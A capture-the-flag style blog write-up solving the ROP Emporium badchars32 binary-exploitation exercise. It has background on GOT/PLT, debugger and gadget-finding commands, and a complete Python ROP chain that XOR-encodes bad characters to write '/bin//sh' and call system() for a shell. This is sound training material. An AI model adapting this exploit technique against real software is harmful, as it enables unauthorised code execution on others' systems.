BadChar32 Binary Exploitation Challenge Solutions - ROP Emporium

Hello Friends





Welcome Again, Today  I am going To share my Solution Of Badchar32 Binary Solutions. And If You Are new, Than Don't forget To Read Previous Post. Actually, Badchar Challenge is Next level Challenge. So, Don't Forget To Check Previous Post here


Before Sharing My Solution, Let's Take A Basic Look Over Few Related Concepts.


What is Binary Exploitation?
Ans. According To Google Search,
                                                       "Binary exploitation is the process of subverting a compiled application such that it violates some trust boundary in a way that is advantageous to you, the attacker. In this module we are going to focus on memory corruption."


What is GOT and PLT?

Ans. According To Systemoverload
                                                          "There’s two types of binaries on any system: statically linked and dynamically linked. Statically linked binaries are self-contained, containing all of the code necessary for them to run within the single file, and do not depend on any external libraries. Dynamically linked binaries (which are the default when you run gcc and most other compilers) do not include a lot of functions, but rely on system libraries to provide a portion of the functionality. For example, when your binary uses printf to print some data, the actual implementation of printf is part of the system C library. Typically, on current GNU/Linux systems, this is provided by libc.so.6, which is the name of the current GNU Libc library.
In order to locate these functions, your program needs to know the address of printf to call it. While this could be written into the raw binary at compile time, there’s some problems with that strategy:
Each time the library changes, the addresses of the functions within the library change, when libc is upgraded, you’d need to rebuild every binary on your system. While this might appeal to Gentoo users, the rest of us would find it an upgrade challenge to replace every binary every time libc received an update.
Modern systems using ASLR load libraries at different locations on each program invocation. Hardcoding addresses would render this impossible.
Consequently, a strategy was developed to allow looking up all of these addresses when the program was run and providing a mechanism to call these functions from libraries. This is known as relocation, and the hard work of doing this at runtime is performed by the linker, aka ld-linux.so. (Note that every dynamically linked program will be linked against the linker, this is actually set in a special ELF section called .interp.) The linker is actually run before any code from your program or libc, but this is completely abstracted from the user by the Linux kernel. 

Relocations

                        Looking at an ELF file, you will discover that it has a number of sections, and it turns out that relocations require several of these sections. I’ll start by defining the sections, then discuss how they’re used in practice.

.got
            This is the GOT, or Global Offset Table. This is the actual table of offsets as filled in by the linker for external symbols.

.plt
           This is the PLT, or Procedure Linkage Table. These are stubs that look up the addresses in the .got.plt section, and either jump to the right address, or trigger the code in the linker to look up the address. (If the address has not been filled in to .got.plt yet.)

.got.plt
           This is the GOT for the PLT. It contains the target addresses (after they have been looked up) or an address back in the .plt to trigger the lookup. Classically, this data was part of the .got section.

.plt.got
             It seems like they wanted every combination of PLT and GOT! This just seems to contain code to jump to the first entry of the .got. I’m not actually sure what uses this. (If you know, please reach out and let me know! In testing a couple of programs, this code is not hit, but maybe there’s some obscure case for this.)
Check Here


How To Setup GDP-Peda?

git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinit
echo "DONE! debug your program with gdb and enjoy"

I Don't Want To Spoil Your Fun. That's Why Try With Hints Command. (Come On it's Not That Much Hard.)

# Hints Commands
#
# Open badchar32 with GDB
gdb -q ./badchar32
#
# Check out the functions in use
gdb-peda$ info functions
#
#
# Time To Take Help From, Metasploit Built-in Unique Pattern Generating Tool
`path/to/metasploit/tool pattern_create.rb` -l 500 > fuzzing_pattern.txt

#
# Run Quickly 
$ gdb -q ./badchar32
Reading symbols from ./badchar32...(no debugging symbols found)...done.
#
# To Redirect Inputs Through Pipe Concept
gdb-peda$ run < fuzzing_pattern.txt
#
# Find Padding
`path/to/metasploit/tool pattern_offset.rb` -q 0xaddress


#
# Install ROPgadget
pip install ropgadget

# Execute ROPgadget against badchar32
ROPgadget --binary ./badchar32 | grep "pop"


Solution



#!/usr/bin/python
import struct
from struct import pack
import re


# ==================================================
# Usages:  (python exp.py; cat) | ./badchars32 
# =================================================

#+ ------------------------------------------------------------------ +
#= +----------------------------------------------------------------+ =
#= |                                                                | =
#= |     _____ ___________   _____                                  | =
#= |    /  ___/  ___| ___ \ |  __ \                                 | =
#= |    \ `--.\ `--.| |_/ / | |  \/_ __ ___  _   _ _ __             | =
#= |     `--. \`--. \ ___ \ | | __| '__/ _ \| | | | '_ \            | =
#= |    /\__/ /\__/ / |_/ / | |_\ \ | | (_) | |_| | |_) |           | =
#= |    \____/\____/\____/   \____/_|  \___/ \__,_| .__/            | =
#= |                                              | |               | =
#= |                                              |_|               | =
#= +----------------------------------------------------------------+ =
#= +----------------------------------------------------------------+ =
#= |                                                                | =
#= |                   surajsinghbisht054@gmail.com                 | =
#= |                      www.bitforestinfo.com                     | =
#= |                                                                | =
#= |                  Try Smart, Try Hard & Don't Cheat             | =
#= +----------------------------------------------------------------+ =
#+ ------------------------------------------------------------------ +



# Tried pattern
pattern = 'AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqA'
#  [Output]
# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#    eax 0x0         eax
#   ebx 0x0         eax
#   ecx 0x20        ecx ascii
#   edx 0x9b19158   edx heap R W 0x0 -->  eax
#   esi 0xf7eea000  (/lib/i386-linux-gnu/libc-2.27.so) esi library R W 0x1d7d6c
#   edi 0x0         eax
#   esp 0xffe89840  esp stack R W 0x43434343 -->  ascii
#   ebp 0x41414141  ebp ascii
#   eip 0x42424242  eip ascii
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# +++++++++++ [Useful Functions Calls] +++++++++++++++++++++
# 007 0x000004e0 0x080484e0 GLOBAL   FUNC   16 imp.system
# 009 0x000004f0 0x080484f0 GLOBAL   FUNC   16 imp.exit
# +++++++++++ [Disassembly] +++++++++++++++++++++++++++++++
#[0x42424242]> pdf @ sym.usefulFunction 
#(fcn) sym.usefulFunction 25
#   sym.usefulFunction ();
#           0x080487a9      55             push ebp
#           0x080487aa      89e5           ebp = esp
#           0x080487ac      83ec08         esp -= 8
#           0x080487af      83ec0c         esp -= 0xc
#           0x080487b2      6873890408     push str.bin_ls             ; 0x8048973 ; "/bin/ls"
#           0x080487b7      e824fdffff     sym.imp.system ()           ; int system(const char *string)
#           0x080487bc      83c410         esp += 0x10
#           0x080487bf      90             
#           0x080487c0      c9             leave 
#           0x080487c1      c3             return



# [Gadgets]
g1 = 0x080488fb # pop ebp ; ret
g2 = 0x08048461 # pop ebx ; ret
g3 = 0x08048897 # pop ecx ; ret
g4 = 0x0804889a # pop edi ; ret
g5 = 0x08048899 # pop esi ; pop edi ; ret
g6 = 0x08048893 # mov dword ptr [edi], esi ; ret
g7 = 0x08048890 # xor byte ptr [ebx], cl ; ret

# 0x08048896 : pop ebx ; pop ecx ; ret
# 0x080488f8 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
# 0x080488fa : pop edi ; pop ebp ; ret
# 0x080488f9 : pop esi ; pop edi ; pop ebp ; ret
# 0x08048899 : pop esi ; pop edi ; ret
# 0x08048893 : mov dword ptr [edi], esi ; ret
# 0x080487fc : mov eax, dword ptr [ebp - 4] ; leave ; ret
# 0x0804862a : mov ebp, esp ; sub esp, 0x14 ; push eax ; call edx
# 0x08048570 : mov ebx, dword ptr [esp] ; ret


# [BAD Chars]
# b i c / <space> f n s


# ++++++++++++++++++++++[ Useful Data ]++++++++++++++++++++++++++
gg1 = 0x080487b2
adr1 = 0x0804a234 # <--- Random Free Space in .bss Section 
adr2 = 0x080484e0 # GLOBAL   FUNC   16 imp.system
adr3 = 0x080484f0 # GLOBAL   FUNC   16 imp.exit

badchar =  'bic/ fns'
XOR = 2


# XOR Function
def xor(addr):
 pay = ''
 pay += pack('I', g2)
 pay += pack('I', addr)
 pay += pack('I', g7)
 return pay

# Writing Function
def writevalue(addr, cmd, badch):
 s = ''
 adrlist = []
 tmpaddr = addr

 for n,i in enumerate(cmd):
  if i in badch:
   s += chr(ord(i) ^ XOR)
   adrlist.append(addr+n)
   #print '[+] Found Badchar : ',i
   #print '[+] Now String : ', s
  else:
   s += i
 rop = ''
 for i in re.findall('....', s):
  rop += pack('I', g5)
  rop += i
  rop += pack('I', tmpaddr)
  tmpaddr += 4
  rop += pack('I', g6)

 rop += pack('I', g3)
 rop += '\x02'*4

 for i in adrlist:
  rop += xor(i)
 return  rop



pay = ''
pay += 'A'*40
pay += 'BBBB'  # EBP
# WriteValue = Automatically Write Data In our Pointed Addr [AUTO XOR Include To Bypass Badchar limitation] 
pay += writevalue(adr1, '/bin//sh', badchar)  # EIP
pay += pack('I', adr2)
pay += pack('I', adr3)
pay += pack('I', adr1)

print pay

Share this

Related Posts

Previous
Next Post »